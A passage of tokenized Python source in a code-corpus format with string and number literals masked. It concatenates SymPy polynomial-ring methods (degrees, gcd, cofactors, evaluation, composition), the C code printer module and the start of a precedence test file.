p2 . items ( ) : <EOL> ka = monomial_mul ( k , m ) <EOL> coeff = get ( ka , zero ) + v * c <EOL> if coeff : <EOL> p1 [ ka ] = coeff <EOL> else : <EOL> del p1 [ ka ] <EOL> return p1 <EOL> def degree ( f , x = None ) : <EOL> """<STR_LIT>""" <EOL> i = f . ring . index ( x ) <EOL> if not f : <EOL> return - oo <EOL> else : <EOL> return max ( [ monom [ i ] for monom in f . itermonoms ( ) ] ) <EOL> def degrees ( f ) : <EOL> """<STR_LIT>""" <EOL> if not f : <EOL> return ( - oo , ) * f . ring . ngens <EOL> else : <EOL> return tuple ( map ( max , list ( zip ( * f . itermonoms ( ) ) ) ) ) <EOL> def tail_degree ( f , x = None ) : <EOL> """<STR_LIT>""" <EOL> i = f . ring . index ( x ) <EOL> if not f : <EOL> return - oo <EOL> else : <EOL> return min ( [ monom [ i ] for monom in f . itermonoms ( ) ] ) <EOL> def tail_degrees ( f ) : <EOL> """<STR_LIT>""" <EOL> if not f : <EOL> return ( - oo , ) * f . ring . ngens <EOL> else : <EOL> return tuple ( map ( min , list ( zip ( * f . itermonoms ( ) ) ) ) ) <EOL> def leading_expv ( self ) : <EOL> """<STR_LIT>""" <EOL> if self : <EOL> return self . ring . leading_expv ( self ) <EOL> else : <EOL> return None <EOL> def _get_coeff ( self , expv ) : <EOL> return self . get ( expv , self . ring . domain . zero ) <EOL> def coeff ( self , element ) : <EOL> """<STR_LIT>""" <EOL> if element == <NUM_LIT:1> : <EOL> return self . _get_coeff ( self . ring . zero_monom ) <EOL> elif isinstance ( element , self . ring . dtype ) : <EOL> terms = list ( element . iterterms ( ) ) <EOL> if len ( terms ) == <NUM_LIT:1> : <EOL> monom , coeff = terms [ <NUM_LIT:0> ] <EOL> if coeff == self . ring . domain . one : <EOL> return self . _get_coeff ( monom ) <EOL> raise ValueError ( "<STR_LIT>" % element ) <EOL> def const ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _get_coeff ( self . ring . zero_monom ) <EOL> @ property <EOL> def LC ( self ) : <EOL> return self . _get_coeff ( self . leading_expv ( ) ) <EOL> @ property <EOL> def LM ( self ) : <EOL> expv = self . leading_expv ( ) <EOL> if expv is None : <EOL> return self . ring . zero_monom <EOL> else : <EOL> return expv <EOL> def leading_monom ( self ) : <EOL> """<STR_LIT>""" <EOL> p = self . ring . zero <EOL> expv = self . leading_expv ( ) <EOL> if expv : <EOL> p [ expv ] = self . ring . domain . one <EOL> return p <EOL> @ property <EOL> def LT ( self ) : <EOL> expv = self . leading_expv ( ) <EOL> if expv is None : <EOL> return ( self . ring . zero_monom , self . ring . domain . zero ) <EOL> else : <EOL> return ( expv , self . _get_coeff ( expv ) ) <EOL> def leading_term ( self ) : <EOL> """<STR_LIT>""" <EOL> p = self . ring . zero <EOL> expv = self . leading_expv ( ) <EOL> if expv : <EOL> p [ expv ] = self [ expv ] <EOL> return p <EOL> def _sorted ( self , seq , order ) : <EOL> if order is None : <EOL> order = self . ring . order <EOL> else : <EOL> order = OrderOpt . preprocess ( order ) <EOL> if order is lex : <EOL> return sorted ( seq , key = lambda monom : monom [ <NUM_LIT:0> ] , reverse = True ) <EOL> else : <EOL> return sorted ( seq , key = lambda monom : order ( monom [ <NUM_LIT:0> ] ) , reverse = True ) <EOL> def coeffs ( self , order = None ) : <EOL> """<STR_LIT>""" <EOL> return [ coeff for _ , coeff in self . terms ( order ) ] <EOL> def monoms ( self , order = None ) : <EOL> """<STR_LIT>""" <EOL> return [ monom for monom , _ in self . terms ( order ) ] <EOL> def terms ( self , order = None ) : <EOL> """<STR_LIT>""" <EOL> return self . _sorted ( list ( self . items ( ) ) , order ) <EOL> def itercoeffs ( self ) : <EOL> """<STR_LIT>""" <EOL> return iter ( self . values ( ) ) <EOL> def itermonoms ( self ) : <EOL> """<STR_LIT>""" <EOL> return iter ( self . keys ( ) ) <EOL> def iterterms ( self ) : <EOL> """<STR_LIT>""" <EOL> return iter ( self . items ( ) ) <EOL> def listcoeffs ( self ) : <EOL> """<STR_LIT>""" <EOL> return list ( self . values ( ) ) <EOL> def listmonoms ( self ) : <EOL> """<STR_LIT>""" <EOL> return list ( self . keys ( ) ) <EOL> def listterms ( self ) : <EOL> """<STR_LIT>""" <EOL> return list ( self . items ( ) ) <EOL> def imul_num ( p , c ) : <EOL> """<STR_LIT>""" <EOL> if p in p . ring . _gens_set : <EOL> return p * c <EOL> if not c : <EOL> p . clear ( ) <EOL> return <EOL> for exp in p : <EOL> p [ exp ] *= c <EOL> return p <EOL> def content ( f ) : <EOL> """<STR_LIT>""" <EOL> domain = f . ring . domain <EOL> cont = domain . zero <EOL> gcd = domain . gcd <EOL> for coeff in f . itercoeffs ( ) : <EOL> cont = gcd ( cont , coeff ) <EOL> return cont <EOL> def primitive ( f ) : <EOL> """<STR_LIT>""" <EOL> cont = f . content ( ) <EOL> return cont , f . quo_ground ( cont ) <EOL> def monic ( f ) : <EOL> """<STR_LIT>""" <EOL> if not f : <EOL> return f <EOL> else : <EOL> return f . quo_ground ( f . LC ) <EOL> def mul_ground ( f , x ) : <EOL> if not x : <EOL> return f . ring . zero <EOL> terms = [ ( monom , coeff * x ) for monom , coeff in f . iterterms ( ) ] <EOL> return f . new ( terms ) <EOL> def mul_monom ( f , monom ) : <EOL> monomial_mul = f . ring . monomial_mul <EOL> terms = [ ( monomial_mul ( f_monom , monom ) , f_coeff ) for f_monom , f_coeff in f . items ( ) ] <EOL> return f . new ( terms ) <EOL> def mul_term ( f , term ) : <EOL> monom , coeff = term <EOL> if not f or not coeff : <EOL> return f . ring . zero <EOL> elif monom == f . ring . zero_monom : <EOL> return f . mul_ground ( coeff ) <EOL> monomial_mul = f . ring . monomial_mul <EOL> terms = [ ( monomial_mul ( f_monom , monom ) , f_coeff * coeff ) for f_monom , f_coeff in f . items ( ) ] <EOL> return f . new ( terms ) <EOL> def quo_ground ( f , x ) : <EOL> domain = f . ring . domain <EOL> if not x : <EOL> raise ZeroDivisionError ( '<STR_LIT>' ) <EOL> if not f or x == domain . one : <EOL> return f <EOL> if domain . has_Field : <EOL> quo = domain . quo <EOL> terms = [ ( monom , quo ( coeff , x ) ) for monom , coeff in f . iterterms ( ) ] <EOL> else : <EOL> terms = [ ( monom , coeff // x ) for monom , coeff in f . iterterms ( ) if not ( coeff % x ) ] <EOL> return f . new ( terms ) <EOL> def quo_term ( f , term ) : <EOL> monom , coeff = term <EOL> if not coeff : <EOL> raise ZeroDivisionError ( "<STR_LIT>" ) <EOL> elif not f : <EOL> return f . ring . zero <EOL> elif monom == f . ring . zero_monom : <EOL> return f . quo_ground ( coeff ) <EOL> term_div = f . _term_div ( ) <EOL> terms = [ term_div ( t , term ) for t in f . iterterms ( ) ] <EOL> return f . new ( [ t for t in terms if t is not None ] ) <EOL> def trunc_ground ( f , p ) : <EOL> if f . ring . domain . is_ZZ : <EOL> terms = [ ] <EOL> for monom , coeff in f . iterterms ( ) : <EOL> coeff = coeff % p <EOL> if coeff > p // <NUM_LIT:2> : <EOL> coeff = coeff - p <EOL> terms . append ( ( monom , coeff ) ) <EOL> else : <EOL> terms = [ ( monom , coeff % p ) for monom , coeff in f . iterterms ( ) ] <EOL> poly = f . new ( terms ) <EOL> poly . strip_zero ( ) <EOL> return poly <EOL> rem_ground = trunc_ground <EOL> def extract_ground ( self , g ) : <EOL> f = self <EOL> fc = f . content ( ) <EOL> gc = g . content ( ) <EOL> gcd = f . ring . domain . gcd ( fc , gc ) <EOL> f = f . quo_ground ( gcd ) <EOL> g = g . quo_ground ( gcd ) <EOL> return gcd , f , g <EOL> def _norm ( f , norm_func ) : <EOL> if not f : <EOL> return f . ring . domain . zero <EOL> else : <EOL> ground_abs = f . ring . domain . abs <EOL> return norm_func ( [ ground_abs ( coeff ) for coeff in f . itercoeffs ( ) ] ) <EOL> def max_norm ( f ) : <EOL> return f . _norm ( max ) <EOL> def l1_norm ( f ) : <EOL> return f . _norm ( sum ) <EOL> def deflate ( f , * G ) : <EOL> ring = f . ring <EOL> polys = [ f ] + list ( G ) <EOL> J = [ <NUM_LIT:0> ] * ring . ngens <EOL> for p in polys : <EOL> for monom in p . itermonoms ( ) : <EOL> for i , m in enumerate ( monom ) : <EOL> J [ i ] = igcd ( J [ i ] , m ) <EOL> for i , b in enumerate ( J ) : <EOL> if not b : <EOL> J [ i ] = <NUM_LIT:1> <EOL> J = tuple ( J ) <EOL> if all ( b == <NUM_LIT:1> for b in J ) : <EOL> return J , polys <EOL> H = [ ] <EOL> for p in polys : <EOL> h = ring . zero <EOL> for I , coeff in p . iterterms ( ) : <EOL> N = [ i // j for i , j in zip ( I , J ) ] <EOL> h [ tuple ( N ) ] = coeff <EOL> H . append ( h ) <EOL> return J , H <EOL> def inflate ( f , J ) : <EOL> poly = f . ring . zero <EOL> for I , coeff in f . iterterms ( ) : <EOL> N = [ i * j for i , j in zip ( I , J ) ] <EOL> poly [ tuple ( N ) ] = coeff <EOL> return poly <EOL> def lcm ( self , g ) : <EOL> f = self <EOL> domain = f . ring . domain <EOL> if not domain . has_Field : <EOL> fc , f = f . primitive ( ) <EOL> gc , g = g . primitive ( ) <EOL> c = domain . lcm ( fc , gc ) <EOL> h = ( f * g ) . quo ( f . gcd ( g ) ) <EOL> if not domain . has_Field : <EOL> return h . mul_ground ( c ) <EOL> else : <EOL> return h . monic ( ) <EOL> def gcd ( f , g ) : <EOL> return f . cofactors ( g ) [ <NUM_LIT:0> ] <EOL> def cofactors ( f , g ) : <EOL> if not f and not g : <EOL> zero = f . ring . zero <EOL> return zero , zero , zero <EOL> elif not f : <EOL> h , cff , cfg = f . _gcd_zero ( g ) <EOL> return h , cff , cfg <EOL> elif not g : <EOL> h , cfg , cff = g . _gcd_zero ( f ) <EOL> return h , cff , cfg <EOL> elif len ( f ) == <NUM_LIT:1> : <EOL> h , cff , cfg = f . _gcd_monom ( g ) <EOL> return h , cff , cfg <EOL> elif len ( g ) == <NUM_LIT:1> : <EOL> h , cfg , cff = g . _gcd_monom ( f ) <EOL> return h , cff , cfg <EOL> J , ( f , g ) = f . deflate ( g ) <EOL> h , cff , cfg = f . _gcd ( g ) <EOL> return ( h . inflate ( J ) , cff . inflate ( J ) , cfg . inflate ( J ) ) <EOL> def _gcd_zero ( f , g ) : <EOL> one , zero = f . ring . one , f . ring . zero <EOL> if g . is_nonnegative : <EOL> return g , zero , one <EOL> else : <EOL> return - g , zero , - one <EOL> def _gcd_monom ( f , g ) : <EOL> ring = f . ring <EOL> ground_gcd = ring . domain . gcd <EOL> ground_quo = ring . domain . quo <EOL> monomial_gcd = ring . monomial_gcd <EOL> monomial_ldiv = ring . monomial_ldiv <EOL> mf , cf = list ( f . iterterms ( ) ) [ <NUM_LIT:0> ] <EOL> _mgcd , _cgcd = mf , cf <EOL> for mg , cg in g . iterterms ( ) : <EOL> _mgcd = monomial_gcd ( _mgcd , mg ) <EOL> _cgcd = ground_gcd ( _cgcd , cg ) <EOL> h = f . new ( [ ( _mgcd , _cgcd ) ] ) <EOL> cff = f . new ( [ ( monomial_ldiv ( mf , _mgcd ) , ground_quo ( cf , _cgcd ) ) ] ) <EOL> cfg = f . new ( [ ( monomial_ldiv ( mg , _mgcd ) , ground_quo ( cg , _cgcd ) ) for mg , cg in g . iterterms ( ) ] ) <EOL> return h , cff , cfg <EOL> def _gcd ( f , g ) : <EOL> ring = f . ring <EOL> if ring . domain . is_QQ : <EOL> return f . _gcd_QQ ( g ) <EOL> elif ring . domain . is_ZZ : <EOL> return f . _gcd_ZZ ( g ) <EOL> else : <EOL> return ring . dmp_inner_gcd ( f , g ) <EOL> def _gcd_ZZ ( f , g ) : <EOL> return heugcd ( f , g ) <EOL> def _gcd_QQ ( self , g ) : <EOL> f = self <EOL> ring = f . ring <EOL> new_ring = ring . clone ( domain = ring . domain . get_ring ( ) ) <EOL> cf , f = f . clear_denoms ( ) <EOL> cg , g = g . clear_denoms ( ) <EOL> f = f . set_ring ( new_ring ) <EOL> g = g . set_ring ( new_ring ) <EOL> h , cff , cfg = f . _gcd_ZZ ( g ) <EOL> h = h . set_ring ( ring ) <EOL> c , h = h . LC , h . monic ( ) <EOL> cff = cff . set_ring ( ring ) . mul_ground ( ring . domain . quo ( c , cf ) ) <EOL> cfg = cfg . set_ring ( ring ) . mul_ground ( ring . domain . quo ( c , cg ) ) <EOL> return h , cff , cfg <EOL> def cancel ( self , g ) : <EOL> """<STR_LIT>""" <EOL> f = self <EOL> ring = f . ring <EOL> if not f : <EOL> return f , ring . one <EOL> domain = ring . domain <EOL> if not ( domain . has_Field and domain . has_assoc_Ring ) : <EOL> _ , p , q = f . cofactors ( g ) <EOL> if q . is_negative : <EOL> p , q = - p , - q <EOL> else : <EOL> new_ring = ring . clone ( domain = domain . get_ring ( ) ) <EOL> cq , f = f . clear_denoms ( ) <EOL> cp , g = g . clear_denoms ( ) <EOL> f = f . set_ring ( new_ring ) <EOL> g = g . set_ring ( new_ring ) <EOL> _ , p , q = f . cofactors ( g ) <EOL> _ , cp , cq = new_ring . domain . cofactors ( cp , cq ) <EOL> p = p . set_ring ( ring ) <EOL> q = q . set_ring ( ring ) <EOL> p_neg = p . is_negative <EOL> q_neg = q . is_negative <EOL> if p_neg and q_neg : <EOL> p , q = - p , - q <EOL> elif p_neg : <EOL> cp , p = - cp , - p <EOL> elif q_neg : <EOL> cp , q = - cp , - q <EOL> p = p . mul_ground ( cp ) <EOL> q = q . mul_ground ( cq ) <EOL> return p , q <EOL> def diff ( f , x ) : <EOL> """<STR_LIT>""" <EOL> ring = f . ring <EOL> i = ring . index ( x ) <EOL> m = ring . monomial_basis ( i ) <EOL> g = ring . zero <EOL> for expv , coeff in f . iterterms ( ) : <EOL> if expv [ i ] : <EOL> e = ring . monomial_ldiv ( expv , m ) <EOL> g [ e ] = coeff * expv [ i ] <EOL> return g <EOL> def __call__ ( f , * values ) : <EOL> if <NUM_LIT:0> < len ( values ) <= f . ring . ngens : <EOL> return f . evaluate ( list ( zip ( f . ring . gens , values ) ) ) <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" % ( f . ring . ngens , len ( values ) ) ) <EOL> def evaluate ( self , x , a = None ) : <EOL> f = self <EOL> if isinstance ( x , list ) and a is None : <EOL> ( X , a ) , x = x [ <NUM_LIT:0> ] , x [ <NUM_LIT:1> : ] <EOL> f = f . evaluate ( X , a ) <EOL> if not x : <EOL> return f <EOL> else : <EOL> x = [ ( Y . drop ( X ) , a ) for ( Y , a ) in x ] <EOL> return f . evaluate ( x ) <EOL> ring = f . ring <EOL> i = ring . index ( x ) <EOL> a = ring . domain . convert ( a ) <EOL> if ring . ngens == <NUM_LIT:1> : <EOL> result = ring . domain . zero <EOL> for ( n , ) , coeff in f . iterterms ( ) : <EOL> result += coeff * a ** n <EOL> return result <EOL> else : <EOL> poly = ring . drop ( x ) . zero <EOL> for monom , coeff in f . iterterms ( ) : <EOL> n , monom = monom [ i ] , monom [ : i ] + monom [ i + <NUM_LIT:1> : ] <EOL> coeff = coeff * a ** n <EOL> if monom in poly : <EOL> coeff = coeff + poly [ monom ] <EOL> if coeff : <EOL> poly [ monom ] = coeff <EOL> else : <EOL> del poly [ monom ] <EOL> else : <EOL> if coeff : <EOL> poly [ monom ] = coeff <EOL> return poly <EOL> def subs ( self , x , a = None ) : <EOL> f = self <EOL> if isinstance ( x , list ) and a is None : <EOL> for X , a in x : <EOL> f = f . subs ( X , a ) <EOL> return f <EOL> ring = f . ring <EOL> i = ring . index ( x ) <EOL> a = ring . domain . convert ( a ) <EOL> if ring . ngens == <NUM_LIT:1> : <EOL> result = ring . domain . zero <EOL> for ( n , ) , coeff in f . iterterms ( ) : <EOL> result += coeff * a ** n <EOL> return ring . ground_new ( result ) <EOL> else : <EOL> poly = ring . zero <EOL> for monom , coeff in f . iterterms ( ) : <EOL> n , monom = monom [ i ] , monom [ : i ] + ( <NUM_LIT:0> , ) + monom [ i + <NUM_LIT:1> : ] <EOL> coeff = coeff * a ** n <EOL> if monom in poly : <EOL> coeff = coeff + poly [ monom ] <EOL> if coeff : <EOL> poly [ monom ] = coeff <EOL> else : <EOL> del poly [ monom ] <EOL> else : <EOL> if coeff : <EOL> poly [ monom ] = coeff <EOL> return poly <EOL> def compose ( f , x , a = None ) : <EOL> ring = f . ring <EOL> poly = ring . zero <EOL> gens_map = dict ( list ( zip ( ring . gens , list ( range ( ring . ngens ) ) ) ) ) <EOL> if a is not None : <EOL> replacements = [ ( x , a ) ] <EOL> else : <EOL> if isinstance ( x , list ) : <EOL> replacements = list ( x ) <EOL> elif isinstance ( x , dict ) : <EOL> replacements = sorted ( list ( x . items ( ) ) , key = lambda k : gens_map [ k [ <NUM_LIT:0> ] ] ) <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> for k , ( x , g ) in enumerate ( replacements ) : <EOL> replacements [ k ] = ( gens_map [ x ] , ring . ring_new ( g ) ) <EOL> for monom , coeff in f . iterterms ( ) : <EOL> monom = list ( monom ) <EOL> subpoly = ring . one <EOL> for i , g in replacements : <EOL> n , monom [ i ] = monom [ i ] , <NUM_LIT:0> <EOL> if n : <EOL> subpoly *= g ** n <EOL> subpoly = subpoly . mul_term ( ( tuple ( monom ) , coeff ) ) <EOL> poly += subpoly <EOL> return poly <EOL> def pdiv ( f , g ) : <EOL> return f . ring . dmp_pdiv ( f , g ) <EOL> def prem ( f , g ) : <EOL> return f . ring . dmp_prem ( f , g ) <EOL> def pquo ( f , g ) : <EOL> return f . ring . dmp_quo ( f , g ) <EOL> def pexquo ( f , g ) : <EOL> return f . ring . dmp_exquo ( f , g ) <EOL> def half_gcdex ( f , g ) : <EOL> return f . ring . dmp_half_gcdex ( f , g ) <EOL> def gcdex ( f , g ) : <EOL> return f . ring . dmp_gcdex ( f , g ) <EOL> def subresultants ( f , g ) : <EOL> return f . ring . dmp_subresultants ( f , g ) <EOL> def resultant ( f , g ) : <EOL> return f . ring . dmp_resultant ( f , g ) <EOL> def discriminant ( f ) : <EOL> return f . ring . dmp_discriminant ( f ) <EOL> def decompose ( f ) : <EOL> if f . ring . is_univariate : <EOL> return f . ring . dup_decompose ( f ) <EOL> else : <EOL> raise MultivariatePolynomialError ( "<STR_LIT>" ) <EOL> def shift ( f , a ) : <EOL> if f . ring . is_univariate : <EOL> return f . ring . dup_shift ( f , a ) <EOL> else : <EOL> raise MultivariatePolynomialError ( "<STR_LIT>" ) <EOL> def sturm ( f ) : <EOL> if f . ring . is_univariate : <EOL> return f . ring . dup_sturm ( f ) <EOL> else : <EOL> raise MultivariatePolynomialError ( "<STR_LIT>" ) <EOL> def gff_list ( f ) : <EOL> return f . ring . dmp_gff_list ( f ) <EOL> def sqf_norm ( f ) : <EOL> return f . ring . dmp_sqf_norm ( f ) <EOL> def sqf_part ( f ) : <EOL> return f . ring . dmp_sqf_part ( f ) <EOL> def sqf_list ( f , all = False ) : <EOL> return f . ring . dmp_sqf_list ( f , all = all ) <EOL> def factor_list ( f ) : <EOL> return f . ring . dmp_factor_list ( f ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import print_function , division <EOL> from sympy . core import S <EOL> from sympy . core . compatibility import string_types , range <EOL> from sympy . printing . codeprinter import CodePrinter , Assignment <EOL> from sympy . printing . precedence import precedence <EOL> known_functions = { <EOL> "<STR_LIT>" : [ ( lambda x : not x . is_integer , "<STR_LIT>" ) ] , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> } <EOL> reserved_words = [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT:int>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT:default>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT:float>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> class CCodePrinter ( CodePrinter ) : <EOL> """<STR_LIT>""" <EOL> printmethod = "<STR_LIT>" <EOL> language = "<STR_LIT:C>" <EOL> _default_settings = { <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:15> , <EOL> '<STR_LIT>' : { } , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : set ( ) , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : '<STR_LIT:_>' , <EOL> } <EOL> def __init__ ( self , settings = { } ) : <EOL> CodePrinter . __init__ ( self , settings ) <EOL> self . known_functions = dict ( known_functions ) <EOL> userfuncs = settings . get ( '<STR_LIT>' , { } ) <EOL> self . known_functions . update ( userfuncs ) <EOL> self . _dereference = set ( settings . get ( '<STR_LIT>' , [ ] ) ) <EOL> self . reserved_words = set ( reserved_words ) <EOL> def _rate_index_position ( self , p ) : <EOL> return p * <NUM_LIT:5> <EOL> def _get_statement ( self , codestring ) : <EOL> return "<STR_LIT>" % codestring <EOL> def _get_comment ( self , text ) : <EOL> return "<STR_LIT>" . format ( text ) <EOL> def _declare_number_const ( self , name , value ) : <EOL> return "<STR_LIT>" . format ( name , value ) <EOL> def _format_code ( self , lines ) : <EOL> return self . indent_code ( lines ) <EOL> def _traverse_matrix_indices ( self , mat ) : <EOL> rows , cols = mat . shape <EOL> return ( ( i , j ) for i in range ( rows ) for j in range ( cols ) ) <EOL> def _get_loop_opening_ending ( self , indices ) : <EOL> open_lines = [ ] <EOL> close_lines = [ ] <EOL> loopstart = "<STR_LIT>" <EOL> for i in indices : <EOL> open_lines . append ( loopstart % { <EOL> '<STR_LIT>' : self . _print ( i . label ) , <EOL> '<STR_LIT:start>' : self . _print ( i . lower ) , <EOL> '<STR_LIT:end>' : self . _print ( i . upper + <NUM_LIT:1> ) } ) <EOL> close_lines . append ( "<STR_LIT:}>" ) <EOL> return open_lines , close_lines <EOL> def _print_Pow ( self , expr ) : <EOL> if "<STR_LIT>" in self . known_functions : <EOL> return self . _print_Function ( expr ) <EOL> PREC = precedence ( expr ) <EOL> if expr . exp == - <NUM_LIT:1> : <EOL> return '<STR_LIT>' % ( self . parenthesize ( expr . base , PREC ) ) <EOL> elif expr . exp == <NUM_LIT:0.5> : <EOL> return '<STR_LIT>' % self . _print ( expr . base ) <EOL> else : <EOL> return '<STR_LIT>' % ( self . _print ( expr . base ) , <EOL> self . _print ( expr . exp ) ) <EOL> def _print_Rational ( self , expr ) : <EOL> p , q = int ( expr . p ) , int ( expr . q ) <EOL> return '<STR_LIT>' % ( p , q ) <EOL> def _print_Indexed ( self , expr ) : <EOL> dims = expr . shape <EOL> elem = S . Zero <EOL> offset = S . One <EOL> for i in reversed ( range ( expr . rank ) ) : <EOL> elem += expr . indices [ i ] * offset <EOL> offset *= dims [ i ] <EOL> return "<STR_LIT>" % ( self . _print ( expr . base . label ) , self . _print ( elem ) ) <EOL> def _print_Idx ( self , expr ) : <EOL> return self . _print ( expr . label ) <EOL> def _print_Exp1 ( self , expr ) : <EOL> return "<STR_LIT>" <EOL> def _print_Pi ( self , expr ) : <EOL> return '<STR_LIT>' <EOL> def _print_Infinity ( self , expr ) : <EOL> return '<STR_LIT>' <EOL> def _print_NegativeInfinity ( self , expr ) : <EOL> return '<STR_LIT>' <EOL> def _print_Piecewise ( self , expr ) : <EOL> if expr . args [ - <NUM_LIT:1> ] . cond != True : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> lines = [ ] <EOL> if expr . has ( Assignment ) : <EOL> for i , ( e , c ) in enumerate ( expr . args ) : <EOL> if i == <NUM_LIT:0> : <EOL> lines . append ( "<STR_LIT>" % self . _print ( c ) ) <EOL> elif i == len ( expr . args ) - <NUM_LIT:1> and c == True : <EOL> lines . append ( "<STR_LIT>" ) <EOL> else : <EOL> lines . append ( "<STR_LIT>" % self . _print ( c ) ) <EOL> code0 = self . _print ( e ) <EOL> lines . append ( code0 ) <EOL> lines . append ( "<STR_LIT:}>" ) <EOL> return "<STR_LIT:\n>" . join ( lines ) <EOL> else : <EOL> ecpairs = [ "<STR_LIT>" % ( self . _print ( c ) , self . _print ( e ) ) <EOL> for e , c in expr . args [ : - <NUM_LIT:1> ] ] <EOL> last_line = "<STR_LIT>" % self . _print ( expr . args [ - <NUM_LIT:1> ] . expr ) <EOL> return "<STR_LIT>" . join ( ecpairs ) + last_line + "<STR_LIT:U+0020>" . join ( [ "<STR_LIT:)>" * len ( ecpairs ) ] ) <EOL> def _print_ITE ( self , expr ) : <EOL> from sympy . functions import Piecewise <EOL> _piecewise = Piecewise ( ( expr . args [ <NUM_LIT:1> ] , expr . args [ <NUM_LIT:0> ] ) , ( expr . args [ <NUM_LIT:2> ] , True ) ) <EOL> return self . _print ( _piecewise ) <EOL> def _print_MatrixElement ( self , expr ) : <EOL> return "<STR_LIT>" . format ( expr . parent , expr . j + <EOL> expr . i * expr . parent . shape [ <NUM_LIT:1> ] ) <EOL> def _print_Symbol ( self , expr ) : <EOL> name = super ( CCodePrinter , self ) . _print_Symbol ( expr ) <EOL> if expr in self . _dereference : <EOL> return '<STR_LIT>' . format ( name ) <EOL> else : <EOL> return name <EOL> def _print_sign ( self , func ) : <EOL> return '<STR_LIT>' . format ( self . _print ( func . args [ <NUM_LIT:0> ] ) ) <EOL> def indent_code ( self , code ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( code , string_types ) : <EOL> code_lines = self . indent_code ( code . splitlines ( True ) ) <EOL> return '<STR_LIT>' . join ( code_lines ) <EOL> tab = "<STR_LIT:U+0020>" <EOL> inc_token = ( '<STR_LIT:{>' , '<STR_LIT:(>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> dec_token = ( '<STR_LIT:}>' , '<STR_LIT:)>' ) <EOL> code = [ line . lstrip ( '<STR_LIT>' ) for line in code ] <EOL> increase = [ int ( any ( map ( line . endswith , inc_token ) ) ) for line in code ] <EOL> decrease = [ int ( any ( map ( line . startswith , dec_token ) ) ) <EOL> for line in code ] <EOL> pretty = [ ] <EOL> level = <NUM_LIT:0> <EOL> for n , line in enumerate ( code ) : <EOL> if line == '<STR_LIT>' or line == '<STR_LIT:\n>' : <EOL> pretty . append ( line ) <EOL> continue <EOL> level -= decrease [ n ] <EOL> pretty . append ( "<STR_LIT>" % ( tab * level , line ) ) <EOL> level += increase [ n ] <EOL> return pretty <EOL> def ccode ( expr , assign_to = None , ** settings ) : <EOL> """<STR_LIT>""" <EOL> return CCodePrinter ( settings ) . doprint ( expr , assign_to ) <EOL> def print_ccode ( expr , ** settings ) : <EOL> """<STR_LIT>""" <EOL> print ( ccode ( expr , ** settings ) ) </s>
<s> from sympy . concrete . products import Product <EOL> from sympy . concrete . summations import Sum <EOL> from sympy . core . function import Derivative <EOL> from sympy . core . numbers import Integer , Rational , Float , oo <EOL> from sympy . core . relational import Rel <EOL> from sympy . core . symbol import symbols <EOL> from sympy . functions import sin <EOL> from sympy . integrals . integrals import Integral <EOL> from sympy . series . order import Order <EOL> from sympy . printing . precedence import precedence , PRECEDENCE <EOL> x , y = symbols ( "<STR_LIT>" ) <EOL> def test_Add ( ) : <EOL> assert precedence ( x + y ) == PRECEDENCE [ "<STR_LIT>" ] <EOL> assert precedence ( x * y + <NUM_LIT:1> ) == PRECEDENCE [ "<STR_LIT>" ] <EOL> def test_Function ( ) : <EOL> assert precedence ( sin ( x ) ) == PRECEDENCE [ "<STR_LIT>" ] <EOL> def test_Derivative ( ) : <EOL> assert precedence ( Derivative ( x , y ) ) == PRECEDENCE [ "<STR_LIT>" ] <EOL> def test_Integral ( ) : <EOL> assert precedence ( Integral ( x , y ) ) == PRECEDENCE [ "<STR_LIT>" ] <EOL> def test_Mul ( ) : <EOL> assert precedence ( x * y ) == PRECEDENCE [ "<STR_LIT>" ] <EOL> assert precedence ( - x * y ) == PRECEDENCE [ "<STR_LIT>" ] <EOL> def test_Number ( ) : <EOL> assert precedence ( Integer ( <NUM_LIT:0> ) ) == PRECEDENCE [ "<STR_LIT>" ] <EOL> assert precedence 